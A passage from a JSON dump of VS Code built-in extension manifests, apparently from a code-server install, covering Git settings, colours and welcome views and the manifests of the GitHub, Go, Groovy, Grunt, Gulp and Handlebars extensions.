operation."},"git.branchSortOrder":{"type":"string","enum":["committerdate","alphabetically"],"default":"committerdate","description":"Controls the sort order for branches."},"git.untrackedChanges":{"type":"string","enum":["mixed","separate","hidden"],"enumDescriptions":["All changes, tracked and untracked, appear together and behave equally.","Untracked changes appear separately in the Source Control view. They are also excluded from several actions.","Untracked changes are hidden and excluded from several actions."],"default":"mixed","description":"Controls how untracked changes behave.","scope":"resource"},"git.requireGitUserConfig":{"type":"boolean","description":"Controls whether to require explicit Git user configuration or allow Git to guess if missing.","default":true,"scope":"resource"},"git.showCommitInput":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to show the commit input in the Git source control panel."},"git.terminalAuthentication":{"type":"boolean","default":true,"description":"Controls whether to enable VS Code to be the authentication handler for Git processes spawned in the Integrated Terminal. Note: Terminals need to be restarted to pick up a change in this setting."},"git.terminalGitEditor":{"type":"boolean","default":false,"description":"Controls whether to enable VS Code to be the Git editor for Git processes spawned in the integrated terminal. Note: Terminals need to be restarted to pick up a change in this setting."},"git.useCommitInputAsStashMessage":{"type":"boolean","scope":"resource","default":false,"description":"Controls whether to use the message from the commit input box as the default stash message."},"git.useIntegratedAskPass":{"type":"boolean","default":true,"description":"Controls whether GIT_ASKPASS should be overwritten to use the integrated version."},"git.githubAuthentication":{"markdownDeprecationMessage":"This setting is now deprecated, please use `#github.gitAuthentication#` instead."},"git.timeline.date":{"type":"string","enum":["committed","authored"],"enumDescriptions":["Use the committed date","Use the authored date"],"default":"committed","description":"Controls which date to use for items in the Timeline view.","scope":"window"},"git.timeline.showAuthor":{"type":"boolean","default":true,"description":"Controls whether to show the commit author in the Timeline view.","scope":"window"},"git.timeline.showUncommitted":{"type":"boolean","default":false,"description":"Controls whether to show uncommitted changes in the Timeline view.","scope":"window"},"git.showActionButton":{"type":"object","additionalProperties":false,"description":"Controls whether an action button is shown in the Source Control view.","properties":{"commit":{"type":"boolean","description":"Show an action button to commit changes when the local branch has modified files ready to be committed."},"publish":{"type":"boolean","description":"Show an action button to publish the local branch when it does not have a tracking remote branch."},"sync":{"type":"boolean","description":"Show an action button to synchronize changes when the local branch is either ahead or behind the remote branch."}},"default":{"commit":true,"publish":true,"sync":true},"scope":"resource"},"git.statusLimit":{"type":"number","scope":"resource","default":10000,"description":"Controls how to limit the number of changes that can be parsed from Git status command. Can be set to 0 for no limit."},"git.repositoryScanIgnoredFolders":{"type":"array","items":{"type":"string"},"default":["node_modules"],"scope":"resource","markdownDescription":"List of folders that are ignored while scanning for Git repositories when `#git.autoRepositoryDetection#` is set to `true` or `subFolders`."},"git.repositoryScanMaxDepth":{"type":"number","scope":"resource","default":1,"markdownDescription":"Controls the depth used when scanning workspace folders for Git repositories when `#git.autoRepositoryDetection#` is set to `true` or `subFolders`. Can be set to `-1` for no limit."},"git.commandsToLog":{"type":"array","items":{"type":"string"},"default":[],"markdownDescription":"List of git commands (ex: commit, push) that would have their `stdout` logged to the [git output](command:git.showOutput). If the git command has a client-side hook configured, the client-side hook's `stdout` will also be logged to the [git output](command:git.showOutput)."},"git.mergeEditor":{"type":"boolean","default":false,"markdownDescription":"Open the merge editor for files that are currently under conflict.","scope":"window"},"git.optimisticUpdate":{"type":"boolean","default":true,"markdownDescription":"Controls whether to optimistically update the state of the Source Control view after running git commands.","scope":"resource","tags":["experimental"]},"git.openRepositoryInParentFolders":{"type":"string","enum":["always","never","prompt"],"enumDescriptions":["Always open a repository in parent folders of workspaces or open files.","Never open a repository in parent folders of workspaces or open files.","Prompt before opening a repository the parent folders of workspaces or open files."],"default":"prompt","markdownDescription":"Control whether a repository in parent folders of workspaces or open files should be opened.","scope":"resource"},"git.similarityThreshold":{"type":"number","default":50,"minimum":0,"maximum":100,"markdownDescription":"Controls the threshold of the similarity index (the amount of additions/deletions compared to the file's size) for changes in a pair of added/deleted files to be considered a rename. **Note:** Requires Git version `2.18.0` or later.","scope":"resource"},"git.blame.editorDecoration.enabled":{"type":"boolean","default":false,"markdownDescription":"Controls whether to show blame information in the editor using editor decorations."},"git.blame.editorDecoration.template":{"type":"string","default":"${subject}, ${authorName} (${authorDateAgo})","markdownDescription":"Template for the blame information editor decoration. Supported variables:\n\n* `hash`: Commit hash\n\n* `hashShort`: First N characters of the commit hash according to `#git.commitShortHashLength#`\n\n* `subject`: First line of the commit message\n\n* `authorName`: Author name\n\n* `authorEmail`: Author email\n\n* `authorDate`: Author date\n\n* `authorDateAgo`: Time difference between now and the author date\n\n"},"git.blame.editorDecoration.disableHover":{"type":"boolean","default":false,"markdownDescription":"Controls whether to disable the blame information editor decoration hover."},"git.blame.statusBarItem.enabled":{"type":"boolean","default":true,"markdownDescription":"Controls whether to show blame information in the status bar."},"git.blame.statusBarItem.template":{"type":"string","default":"${authorName} (${authorDateAgo})","markdownDescription":"Template for the blame information status bar item. Supported variables:\n\n* `hash`: Commit hash\n\n* `hashShort`: First N characters of the commit hash according to `#git.commitShortHashLength#`\n\n* `subject`: First line of the commit message\n\n* `authorName`: Author name\n\n* `authorEmail`: Author email\n\n* `authorDate`: Author date\n\n* `authorDateAgo`: Time difference between now and the author date\n\n"},"git.blame.ignoreWhitespace":{"type":"boolean","default":false,"markdownDescription":"Controls whether to ignore whitespace changes when computing blame information."},"git.commitShortHashLength":{"type":"number","default":7,"minimum":7,"maximum":40,"markdownDescription":"Controls the length of the commit short hash.","scope":"resource"},"git.diagnosticsCommitHook.enabled":{"type":"boolean","default":false,"markdownDescription":"Controls whether to check for unresolved diagnostics before committing.","scope":"resource"},"git.diagnosticsCommitHook.sources":{"type":"object","additionalProperties":{"type":"string","enum":["error","warning","information","hint","none"]},"default":{"*":"error"},"markdownDescription":"Controls the list of sources (**Item**) and the minimum severity (**Value**) to be considered before committing. **Note:** To ignore diagnostics from a particular source, add the source to the list and set the minimum severity to `none`.","scope":"resource"},"git.discardUntrackedChangesToTrash":{"type":"boolean","default":true,"markdownDescription":"Controls whether discarding untracked changes moves the file(s) to the Recycle Bin (Windows), Trash (macOS, Linux) instead of deleting them permanently. **Note:** This setting has no effect when connected to a remote or when running in Linux as a snap package."},"git.showReferenceDetails":{"type":"boolean","default":true,"markdownDescription":"Controls whether to show the details of the last commit for Git refs in the checkout, branch, and tag pickers."}}},"colors":[{"id":"gitDecoration.addedResourceForeground","description":"Color for added resources.","defaults":{"light":"#587c0c","dark":"#81b88b","highContrast":"#a1e3ad","highContrastLight":"#374e06"}},{"id":"gitDecoration.modifiedResourceForeground","description":"Color for modified resources.","defaults":{"light":"#895503","dark":"#E2C08D","highContrast":"#E2C08D","highContrastLight":"#895503"}},{"id":"gitDecoration.deletedResourceForeground","description":"Color for deleted resources.","defaults":{"light":"#ad0707","dark":"#c74e39","highContrast":"#c74e39","highContrastLight":"#ad0707"}},{"id":"gitDecoration.renamedResourceForeground","description":"Color for renamed or copied resources.","defaults":{"light":"#007100","dark":"#73C991","highContrast":"#73C991","highContrastLight":"#007100"}},{"id":"gitDecoration.untrackedResourceForeground","description":"Color for untracked resources.","defaults":{"light":"#007100","dark":"#73C991","highContrast":"#73C991","highContrastLight":"#007100"}},{"id":"gitDecoration.ignoredResourceForeground","description":"Color for ignored resources.","defaults":{"light":"#8E8E90","dark":"#8C8C8C","highContrast":"#A7A8A9","highContrastLight":"#8e8e90"}},{"id":"gitDecoration.stageModifiedResourceForeground","description":"Color for modified resources which have been staged.","defaults":{"light":"#895503","dark":"#E2C08D","highContrast":"#E2C08D","highContrastLight":"#895503"}},{"id":"gitDecoration.stageDeletedResourceForeground","description":"Color for deleted resources which have been staged.","defaults":{"light":"#ad0707","dark":"#c74e39","highContrast":"#c74e39","highContrastLight":"#ad0707"}},{"id":"gitDecoration.conflictingResourceForeground","description":"Color for resources with conflicts.","defaults":{"light":"#ad0707","dark":"#e4676b","highContrast":"#c74e39","highContrastLight":"#ad0707"}},{"id":"gitDecoration.submoduleResourceForeground","description":"Color for submodule resources.","defaults":{"light":"#1258a7","dark":"#8db9e2","highContrast":"#8db9e2","highContrastLight":"#1258a7"}},{"id":"git.blame.editorDecorationForeground","description":"Color for the blame editor decoration.","defaults":{"dark":"editorInlayHint.foreground","light":"editorInlayHint.foreground","highContrast":"editorInlayHint.foreground","highContrastLight":"editorInlayHint.foreground"}}],"configurationDefaults":{"[git-commit]":{"editor.rulers":[50,72],"editor.wordWrap":"off","workbench.editor.restoreViewState":false},"[git-rebase]":{"workbench.editor.restoreViewState":false}},"viewsWelcome":[{"view":"scm","contents":"If you would like to use Git features, please enable Git in your [settings](command:workbench.action.openSettings?%5B%22git.enabled%22%5D).\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"!config.git.enabled"},{"view":"scm","contents":"Install Git, a popular source control system, to track code changes and collaborate with others. Learn more in our [Git guides](https://aka.ms/vscode-scm).","when":"config.git.enabled && git.missing && remoteName != ''"},{"view":"scm","contents":"[Download Git for macOS](https://git-scm.com/download/mac)\nAfter installing, please [reload](command:workbench.action.reloadWindow) (or [troubleshoot](command:git.showOutput)). Additional source control providers can be installed [from the Marketplace](command:workbench.extensions.search?%22%40category%3A%5C%22scm%20providers%5C%22%22).","when":"config.git.enabled && git.missing && remoteName == '' && isMac"},{"view":"scm","contents":"[Download Git for Windows](https://git-scm.com/download/win)\nAfter installing, please [reload](command:workbench.action.reloadWindow) (or [troubleshoot](command:git.showOutput)). Additional source control providers can be installed [from the Marketplace](command:workbench.extensions.search?%22%40category%3A%5C%22scm%20providers%5C%22%22).","when":"config.git.enabled && git.missing && remoteName == '' && isWindows"},{"view":"scm","contents":"Source control depends on Git being installed.\n[Download Git for Linux](https://git-scm.com/download/linux)\nAfter installing, please [reload](command:workbench.action.reloadWindow) (or [troubleshoot](command:git.showOutput)). Additional source control providers can be installed [from the Marketplace](command:workbench.extensions.search?%22%40category%3A%5C%22scm%20providers%5C%22%22).","when":"config.git.enabled && git.missing && remoteName == '' && isLinux"},{"view":"scm","contents":"In order to use Git features, you can open a folder containing a Git repository or clone from a URL.\n[Open Folder](command:vscode.openFolder)\n[Clone Repository](command:git.cloneRecursive)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && workbenchState == empty && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0","enablement":"git.state == initialized","group":"2_open@1"},{"view":"scm","contents":"The workspace currently open doesn't have any folders containing Git repositories.\n[Add Folder to Workspace](command:workbench.action.addRootFolder)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && workbenchState == workspace && workspaceFolderCount == 0 && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0","enablement":"git.state == initialized","group":"2_open@1"},{"view":"scm","contents":"Scanning folder for Git repositories...","when":"config.git.enabled && !git.missing && workbenchState == folder && workspaceFolderCount != 0 && git.state != initialized"},{"view":"scm","contents":"Scanning workspace for Git repositories...","when":"config.git.enabled && !git.missing && workbenchState == workspace && workspaceFolderCount != 0 && git.state != initialized"},{"view":"scm","contents":"The folder currently open doesn't have a Git repository. You can initialize a repository which will enable source control features powered by Git.\n[Initialize Repository](command:git.init?%5Btrue%5D)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && git.state == initialized && workbenchState == folder && scm.providerCount == 0 && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0 && remoteName != 'codespaces'","group":"5_scm@1"},{"view":"scm","contents":"The workspace currently open doesn't have any folders containing Git repositories. You can initialize a repository on a folder which will enable source control features powered by Git.\n[Initialize Repository](command:git.init)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && git.state == initialized && workbenchState == workspace && workspaceFolderCount != 0 && scm.providerCount == 0 && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0 && remoteName != 'codespaces'","group":"5_scm@1"},{"view":"scm","contents":"A Git repository was found in the parent folders of the workspace or the open file(s).\n[Open Repository](command:git.openRepositoriesInParentFolders)\nUse the [git.openRepositoryInParentFolders](command:workbench.action.openSettings?%5B%22git.openRepositoryInParentFolders%22%5D) setting to control whether Git repositories in parent folders of workspaces or open files are opened. To learn more [read our docs](https://aka.ms/vscode-git-repository-in-parent-folders).","when":"config.git.enabled && !git.missing && git.state == initialized && git.parentRepositoryCount == 1"},{"view":"scm","contents":"Git repositories were found in the parent folders of the workspace or the open file(s).\n[Open Repository](command:git.openRepositoriesInParentFolders)\nUse the [git.openRepositoryInParentFolders](command:workbench.action.openSettings?%5B%22git.openRepositoryInParentFolders%22%5D) setting to control whether Git repositories in parent folders of workspace or open files are opened. To learn more [read our docs](https://aka.ms/vscode-git-repository-in-parent-folders).","when":"config.git.enabled && !git.missing && git.state == initialized && git.parentRepositoryCount > 1"},{"view":"scm","contents":"The detected Git repository is potentially unsafe as the folder is owned by someone other than the current user.\n[Manage Unsafe Repositories](command:git.manageUnsafeRepositories)\nTo learn more about unsafe repositories [read our docs](https://aka.ms/vscode-git-unsafe-repository).","when":"config.git.enabled && !git.missing && git.state == initialized && git.unsafeRepositoryCount == 1"},{"view":"scm","contents":"The detected Git repositories are potentially unsafe as the folders are owned by someone other than the current user.\n[Manage Unsafe Repositories](command:git.manageUnsafeRepositories)\nTo learn more about unsafe repositories [read our docs](https://aka.ms/vscode-git-unsafe-repository).","when":"config.git.enabled && !git.missing && git.state == initialized && git.unsafeRepositoryCount > 1"},{"view":"scm","contents":"A Git repository was found that was previously closed.\n[Reopen Closed Repository](command:git.reopenClosedRepositories)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && git.state == initialized && git.closedRepositoryCount == 1"},{"view":"scm","contents":"Git repositories were found that were previously closed.\n[Reopen Closed Repositories](command:git.reopenClosedRepositories)\nTo learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && !git.missing && git.state == initialized && git.closedRepositoryCount > 1"},{"view":"explorer","contents":"You can clone a repository locally.\n[Clone Repository](command:git.clone 'Clone a repository once the Git extension has activated')","when":"config.git.enabled && git.state == initialized && scm.providerCount == 0","group":"5_scm@1"},{"view":"explorer","contents":"To learn more about how to use Git and source control in VS Code [read our docs](https://aka.ms/vscode-scm).","when":"config.git.enabled && git.state == initialized && scm.providerCount == 0","group":"5_scm@10"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/git","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.git-base"},"manifest":{"name":"git-base","displayName":"Git Base","description":"Git static contributions and pickers.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"categories":["Other"],"activationEvents":["*"],"main":"./dist/extension.js","browser":"./dist/browser/extension.js","icon":"resources/icons/git.png","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"commands":[{"command":"git-base.api.getRemoteSources","title":"Get Remote Sources","category":"Git Base API"}],"menus":{"commandPalette":[{"command":"git-base.api.getRemoteSources","when":"false"}]},"languages":[{"id":"git-commit","aliases":["Git Commit Message","git-commit"],"filenames":["COMMIT_EDITMSG","MERGE_MSG"],"configuration":"./languages/git-commit.language-configuration.json"},{"id":"git-rebase","aliases":["Git Rebase Message","git-rebase"],"filenames":["git-rebase-todo"],"filenamePatterns":["**/rebase-merge/done"],"configuration":"./languages/git-rebase.language-configuration.json"},{"id":"ignore","aliases":["Ignore","ignore"],"extensions":[".gitignore_global",".gitignore",".git-blame-ignore-revs"],"configuration":"./languages/ignore.language-configuration.json"}],"grammars":[{"language":"git-commit","scopeName":"text.git-commit","path":"./syntaxes/git-commit.tmLanguage.json"},{"language":"git-rebase","scopeName":"text.git-rebase","path":"./syntaxes/git-rebase.tmLanguage.json"},{"language":"ignore","scopeName":"source.ignore","path":"./syntaxes/ignore.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/git-base","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.github"},"manifest":{"name":"github","displayName":"GitHub","description":"GitHub features for VS Code","publisher":"vscode","license":"MIT","version":"0.0.1","engines":{"vscode":"^1.41.0"},"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","icon":"images/icon.png","categories":["Other"],"activationEvents":["*"],"extensionDependencies":["vscode.git-base"],"main":"./dist/extension.js","type":"module","capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"enabledApiProposals":["canonicalUriProvider","contribEditSessions","contribShareMenu","contribSourceControlHistoryItemMenu","scmHistoryProvider","shareProvider","timeline"],"contributes":{"commands":[{"command":"github.publish","title":"Publish to GitHub"},{"command":"github.copyVscodeDevLink","title":"Copy vscode.dev Link"},{"command":"github.copyVscodeDevLinkFile","title":"Copy vscode.dev Link"},{"command":"github.copyVscodeDevLinkWithoutRange","title":"Copy vscode.dev Link"},{"command":"github.openOnVscodeDev","title":"Open in vscode.dev","icon":"$(globe)"},{"command":"github.graph.openOnGitHub","title":"Open on GitHub","icon":"$(github)"},{"command":"github.timeline.openOnGitHub","title":"Open on GitHub","icon":"$(github)"}],"continueEditSession":[{"command":"github.openOnVscodeDev","when":"github.hasGitHubRepo","qualifiedName":"Continue Working in vscode.dev","category":"Remote Repositories","remoteGroup":"virtualfs_44_vscode-vfs_2_web@2"}],"menus":{"commandPalette":[{"command":"github.publish","when":"git-base.gitEnabled && workspaceFolderCount != 0 && remoteName != 'codespaces'"},{"command":"github.graph.openOnGitHub","when":"false"},{"command":"github.copyVscodeDevLink","when":"false"},{"command":"github.copyVscodeDevLinkFile","when":"false"},{"command":"github.copyVscodeDevLinkWithoutRange","when":"false"},{"command":"github.openOnVscodeDev","when":"false"},{"command":"github.timeline.openOnGitHub","when":"false"}],"file/share":[{"command":"github.copyVscodeDevLinkFile","when":"github.hasGitHubRepo && remoteName != 'codespaces'","group":"0_vscode@0"}],"editor/context/share":[{"command":"github.copyVscodeDevLink","when":"github.hasGitHubRepo && resourceScheme != untitled && !isInEmbeddedEditor && remoteName != 'codespaces'","group":"0_vscode@0"}],"explorer/context/share":[{"command":"github.copyVscodeDevLinkWithoutRange","when":"github.hasGitHubRepo && resourceScheme != untitled && !isInEmbeddedEditor && remoteName != 'codespaces'","group":"0_vscode@0"}],"editor/lineNumber/context":[{"command":"github.copyVscodeDevLink","when":"github.hasGitHubRepo && resourceScheme != untitled && activeEditor == workbench.editors.files.textFileEditor && config.editor.lineNumbers == on && remoteName != 'codespaces'","group":"1_cutcopypaste@2"},{"command":"github.copyVscodeDevLink","when":"github.hasGitHubRepo && resourceScheme != untitled && activeEditor == workbench.editor.notebook && remoteName != 'codespaces'","group":"1_cutcopypaste@2"}],"editor/title/context/share":[{"command":"github.copyVscodeDevLinkWithoutRange","when":"github.hasGitHubRepo && resourceScheme != untitled && remoteName != 'codespaces'","group":"0_vscode@0"}],"scm/historyItem/context":[{"command":"github.graph.openOnGitHub","when":"github.hasGitHubRepo","group":"0_view@2"}],"timeline/item/context":[{"command":"github.timeline.openOnGitHub","group":"1_actions@3","when":"github.hasGitHubRepo && timelineItem =~ /git:file:commit\\b/"}]},"configuration":[{"title":"GitHub","properties":{"github.branchProtection":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to query repository rules for GitHub repositories"},"github.gitAuthentication":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to enable automatic GitHub authentication for git commands within VS Code."},"github.gitProtocol":{"type":"string","enum":["https","ssh"],"default":"https","description":"Controls which protocol is used to clone a GitHub repository"},"github.showAvatar":{"type":"boolean","scope":"resource","default":true,"description":"Controls whether to show the GitHub avatar of the commit author in various hovers (ex: Git blame, Timeline, Source Control Graph, etc.)"}}}],"viewsWelcome":[{"view":"scm","contents":"You can directly publish this folder to a GitHub repository. Once published, you'll have access to source control features powered by Git and GitHub.\n[$(github) Publish to GitHub](command:github.publish)","when":"config.git.enabled && git.state == initialized && workbenchState == folder && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0"},{"view":"scm","contents":"You can directly publish a workspace folder to a GitHub repository. Once published, you'll have access to source control features powered by Git and GitHub.\n[$(github) Publish to GitHub](command:github.publish)","when":"config.git.enabled && git.state == initialized && workbenchState == workspace && workspaceFolderCount != 0 && git.parentRepositoryCount == 0 && git.unsafeRepositoryCount == 0 && git.closedRepositoryCount == 0"}],"markdown.previewStyles":["./markdown.css"]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/github","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.github-authentication"},"manifest":{"name":"github-authentication","displayName":"GitHub Authentication","description":"GitHub Authentication Provider","publisher":"vscode","license":"MIT","version":"0.0.2","engines":{"vscode":"^1.41.0"},"icon":"images/icon.png","categories":["Other"],"api":"none","extensionKind":["ui","workspace"],"enabledApiProposals":["authIssuers","authProviderSpecific"],"activationEvents":[],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":"limited","restrictedConfigurations":["github-enterprise.uri"]}},"contributes":{"authentication":[{"label":"GitHub","id":"github","authorizationServerGlobs":["https://github.com/login/oauth"]},{"label":"GitHub Enterprise Server","id":"github-enterprise","authorizationServerGlobs":["*"]}],"configuration":[{"title":"GHE.com & GitHub Enterprise Server Authentication","properties":{"github-enterprise.uri":{"type":"string","markdownDescription":"The URI for your GHE.com or GitHub Enterprise Server instance.\n\nExamples:\n* GHE.com: `https://octocat.ghe.com`\n* GitHub Enterprise Server: `https://github.octocat.com`\n\n> **Note:** This should _not_ be set to a GitHub.com URI. If your account exists on GitHub.com or is a GitHub Enterprise Managed User, you do not need any additional configuration and can simply log in to GitHub.","pattern":"^(?:$|(https?)://(?!github\\.com).*)"},"github-authentication.useElectronFetch":{"type":"boolean","default":true,"scope":"application","markdownDescription":"When true, uses Electron's built-in fetch function for HTTP requests. When false, uses the Node.js global fetch function. This setting only applies when running in the Electron environment. **Note:** A restart is required for this setting to take effect."},"github-authentication.preferDeviceCodeFlow":{"type":"boolean","default":false,"scope":"application","markdownDescription":"When true, prioritize the device code flow for authentication instead of other available flows. This is useful for environments like WSL where the local server or URL handler flows may not work as expected."}}}]},"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","main":"./dist/extension.js","browser":"./dist/browser/extension.js","repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/github-authentication","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.go"},"manifest":{"name":"go","displayName":"Go Language Basics","description":"Provides syntax highlighting and bracket matching in Go files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin worlpaker/go-syntax syntaxes/go.tmLanguage.json ./syntaxes/go.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"go","extensions":[".go"],"aliases":["Go"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"go","scopeName":"source.go","path":"./syntaxes/go.tmLanguage.json"}],"configurationDefaults":{"[go]":{"editor.insertSpaces":false}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/go","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.groovy"},"manifest":{"name":"groovy","displayName":"Groovy Language Basics","description":"Provides snippets, syntax highlighting and bracket matching in Groovy files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin textmate/groovy.tmbundle Syntaxes/Groovy.tmLanguage ./syntaxes/groovy.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"groovy","aliases":["Groovy","groovy"],"extensions":[".groovy",".gvy",".gradle",".jenkinsfile",".nf"],"filenames":["Jenkinsfile"],"filenamePatterns":["Jenkinsfile*"],"firstLine":"^#!.*\\bgroovy\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"groovy","scopeName":"source.groovy","path":"./syntaxes/groovy.tmLanguage.json"}],"snippets":[{"language":"groovy","path":"./snippets/groovy.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/groovy","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.grunt"},"manifest":{"name":"grunt","publisher":"vscode","description":"Extension to add Grunt capabilities to VS Code.","displayName":"Grunt support for VS Code","version":"1.0.0","private":true,"icon":"images/grunt.png","license":"MIT","engines":{"vscode":"*"},"categories":["Other"],"main":"./dist/main","activationEvents":["onTaskType:grunt"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"contributes":{"configuration":{"id":"grunt","type":"object","title":"Grunt","properties":{"grunt.autoDetect":{"scope":"application","type":"string","enum":["off","on"],"default":"off","description":"Controls enablement of Grunt task detection. Grunt task detection can cause files in any open workspace to be executed."}}},"taskDefinitions":[{"type":"grunt","required":["task"],"properties":{"task":{"type":"string","description":"The Grunt task to customize."},"args":{"type":"array","description":"Command line arguments to pass to the grunt task"},"file":{"type":"string","description":"The Grunt file that provides the task. Can be omitted."}},"when":"shellExecutionSupported"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/grunt","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.gulp"},"manifest":{"name":"gulp","publisher":"vscode","description":"Extension to add Gulp capabilities to VSCode.","displayName":"Gulp support for VSCode","version":"1.0.0","icon":"images/gulp.png","license":"MIT","engines":{"vscode":"*"},"categories":["Other"],"main":"./dist/main","activationEvents":["onTaskType:gulp"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"contributes":{"configuration":{"id":"gulp","type":"object","title":"Gulp","properties":{"gulp.autoDetect":{"scope":"application","type":"string","enum":["off","on"],"default":"off","description":"Controls enablement of Gulp task detection. Gulp task detection can cause files in any open workspace to be executed."}}},"taskDefinitions":[{"type":"gulp","required":["task"],"properties":{"task":{"type":"string","description":"The Gulp task to customize."},"file":{"type":"string","description":"The Gulp file that provides the task. Can be omitted."}},"when":"shellExecutionSupported"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/gulp","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.handlebars"},"manifest":{"name":"handlebars","displayName":"Handlebars Language Basics","description":"Provides syntax highlighting and bracket matching in Handlebars files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin daaain/Handlebars grammars/Handlebars.json ./syntaxes/Handlebars.tmLanguage.json"},"categories":["Programming Languages"],"extensionKind":["ui","workspace"],"contributes":{"languages":[{"id":"handlebars","extensions":[".handlebars",".hbs",".hjs"],"aliases":["Handlebars","handlebars"],"mimetypes":["text/x-handlebars-template"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"handlebars","scopeName":"text.html.handlebars","path":"./syntaxes/Handlebars.tmLanguage.json"}],"htmlLanguageParticipants":[{"languageId":"handlebars","autoInsert":true}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/handlebars","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[[2,"property `extensionKind` can be defined only if property `main` is also defined."]],"preRelease":false},{"type":0,"identifier":{"id":"vscode.hlsl"},"manifest":{"name":"hlsl","displayName":"HLSL Language Basics","description":"Provides syntax highlighting and bracket matching in HLSL files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin tgjones/shaders-tmLanguage grammars/hlsl.json ./syntaxes/hlsl.tmLanguage.json"},"categories":["Programming 